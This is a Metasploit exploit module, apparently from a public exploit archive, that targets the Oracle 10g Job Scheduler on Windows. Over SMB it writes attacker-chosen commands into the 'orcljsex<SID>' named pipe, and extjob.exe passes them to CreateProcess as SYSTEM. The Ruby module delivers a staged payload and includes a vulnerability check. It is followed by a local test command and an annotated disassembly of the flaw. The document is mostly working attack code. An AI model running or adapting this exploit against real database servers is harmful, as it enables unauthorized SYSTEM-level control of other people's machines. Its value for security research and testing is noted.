Oracle Job Scheduler Named Pipe Command Execution

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::SMB  
include Msf::Exploit::CmdStagerVBS  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Oracle Job Scheduler Named Pipe Command Execution',  
'Description' => %q{  
This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job  
Scheduler is implemented via the component extjob.exe which listens on a named pipe  
called "orcljsex<SID>" and execute arbitrary commands received throw this channel via  
CreateProcess(). In order to connect to the Named Pipe remotely SMB access is required.  
This module has been tested on Oracle 10g Release 1 where the Oracle Job Scheduler  
runs as SYSTEM on Windows but it's disabled by default.  
},  
'Author' =>  
[  
'David Litchfield', # Vulnerability discovery and exploit  
'juan vazquez', # Metasploit module  
'sinn3r' # Metasploit fu  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'URL', 'http://www.amazon.com/Oracle-Hackers-Handbook-Hacking-Defending/dp/0470080221' ],  
],  
'Payload' =>  
{  
'Space' => 2048,  
},  
'Platform' => 'win',  
'Targets' => [['Automatic',{}]],  
'Privileged' => true,  
'DisclosureDate' => 'Jan 01 2007',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('SID', [ true, 'The database sid', 'ORCL'])  
], self.class)  
  
end  
  
def exploit  
print_status("Exploiting through \\\\#{datastore['RHOST']}\\orcljsex#{datastore['SID']} named pipe...")  
execute_cmdstager({:linemax => 1500})  
handler  
end  
  
def execute_command(cmd, opts)  
connect()  
smb_login()  
pipe = simple.create_pipe("\\orcljsex#{datastore['SID']}")  
pipe.write("cmd.exe /q /c #{cmd}")  
pipe.close  
disconnect  
end  
  
def check  
  
begin  
connect()  
smb_login()  
pipe = simple.create_pipe("\\orcljsex#{datastore['SID']}")  
pipe.write("cmd.exe /q /c dir")  
result = pipe.read() # Exit Code  
pipe.close  
disconnect  
rescue  
return Exploit::CheckCode::Safe  
end  
  
if result == "1" # Exit Code should be 1  
return Exploit::CheckCode::Vulnerable  
end  
  
return Exploit::CheckCode::Safe  
  
end  
  
end  
  
=begin  
How To Test locally:  
1. Go to Administrative Tools -> Services -> Set 'OracleJobSchedulerORCL' to automatic, and  
then Start the service.  
2. Make sure you know your SMBUser and SMBPass  
3. Run:  
C:\Documents and Settings\juan\PipeList>echo cmd.exe /c calc.exe > \\.\pipe\orcljsexorcl  
  
Code Analysis of extjob.exe (Oracle 10g Release 1)  
=================================================  
  
From _ServiceStart():  
  
* Create Named Pipe and store handle on "esi":  
  
.text:004017EC push offset _pipename  
.text:004017F1 lea ecx, [ebp+Name]  
.text:004017F7 push offset $SG59611 ; "\\\\.\\pipe\\orcljsex%s"  
.text:004017FC push ecx  
.text:004017FD jmp short loc_401810  
.text:004017FF ; ---------------------------------------------------------------------------  
.text:004017FF  
.text:004017FF loc_4017FF: ; CODE XREF: _ServiceStart+FAj  
.text:004017FF push offset $SG59613  
.text:00401804 lea edx, [ebp+Name]  
.text:0040180A push offset $SG59614 ; "\\\\.\\pipe\\orcljsex%s"  
.text:0040180F push edx ; Dest  
.text:00401810  
.text:00401810 loc_401810: ; CODE XREF: _ServiceStart+10Dj  
.text:00401810 call ds:__imp__sprintf  
.text:00401816 add esp, 0Ch  
.text:00401819 push edi  
.text:0040181A push edi  
.text:0040181B push 4  
.text:0040181D call _ReportStatusToSCMgr  
.text:00401822 add esp, 0Ch  
.text:00401825 test eax, eax  
.text:00401827 jz loc_4018EC  
.text:0040182D mov edi, ds:__imp__CreateNamedPipeA@32 ; CreateNamedPipeA(x,x,x,x,x,x,x,x)  
.text:0040185C mov esi, eax  
  
* Connect Named Pipe  
  
.text:0040188F push eax ; lpOverlapped  
.text:00401890 push esi ; hNamedPipe  
.text:00401891 call ds:__imp__ConnectNamedPipe@8 ; ConnectNamedPipe(x,x)  
  
* Create Thread with ExecMain() as lpStartAddress and esi (The Pipe handle) as parameter  
  
.text:004018B9 lea edx, [ebp+ThreadId]  
.text:004018BC push edx ; lpThreadId  
.text:004018BD push 0 ; dwCreationFlags  
.text:004018BF push esi ; lpParameter  
.text:004018C0 push offset _ExecMain ; lpStartAddress  
.text:004018C5 push 0 ; dwStackSize  
.text:004018C7 push 0 ; lpThreadAttributes  
.text:004018C9 call ds:__imp__CreateThread@24 ; CreateThread(x,x,x,x,x,x)  
  
From ExecMain():  
  
* Stores Named Pipe Handle in ebx  
  
.text:0040197C mov ebx, [ebp+hObject]  
  
* Read From Named Pipe  
  
.text:004019C4 lea eax, [ebp+NumberOfBytesRead]  
.text:004019C7 push edx ; lpOverlapped  
.text:004019C8 push eax ; lpNumberOfBytesRead  
.text:004019C9 lea ecx, [ebp+Buffer]  
.text:004019CF push 10000h ; nNumberOfBytesToRead  
.text:004019D4 push ecx ; lpBuffer  
.text:004019D5 push ebx ; hFile  
.text:004019D6 call ds:__imp__ReadFile@20 ; ReadFile(x,x,x,x,x)  
  
* CreateProcess with lpCommandLine full controlled by the user input  
  
.text:00401A06 mov ecx, 11h  
.text:00401A0B xor eax, eax  
.text:00401A0D lea edi, [ebp+StartupInfo]  
.text:00401A10 push esi  
.text:00401A11 rep stosd  
.text:00401A13 lea eax, [ebp+ProcessInformation]  
.text:00401A16 lea ecx, [ebp+StartupInfo]  
.text:00401A19 push eax ; lpProcessInformation  
.text:00401A1A push ecx ; lpStartupInfo  
.text:00401A1B push 0 ; lpCurrentDirectory  
.text:00401A1D push 0 ; lpEnvironment  
.text:00401A1F push 0 ; dwCreationFlags  
.text:00401A21 push 0 ; bInheritHandles  
.text:00401A23 push 0 ; lpThreadAttributes  
.text:00401A25 lea edx, [ebp+Buffer]  
.text:00401A2B push 0 ; lpProcessAttributes  
.text:00401A2D push edx ; lpCommandLine  
.text:00401A2E push 0 ; lpApplicationName  
.text:00401A30 mov [ebp+StartupInfo.cb], 44h  
.text:00401A37 mov [ebp+StartupInfo.wShowWindow], 5  
.text:00401A3D mov [ebp+StartupInfo.dwFlags], 100h  
.text:00401A44 mov [ebp+StartupInfo.lpDesktop], offset $SG59671  
.text:00401A4B call ds:__imp__CreateProcessA@40 ; CreateProcessA(x,x,x,x,x,x,x,x,x,x)  
  
  
=end`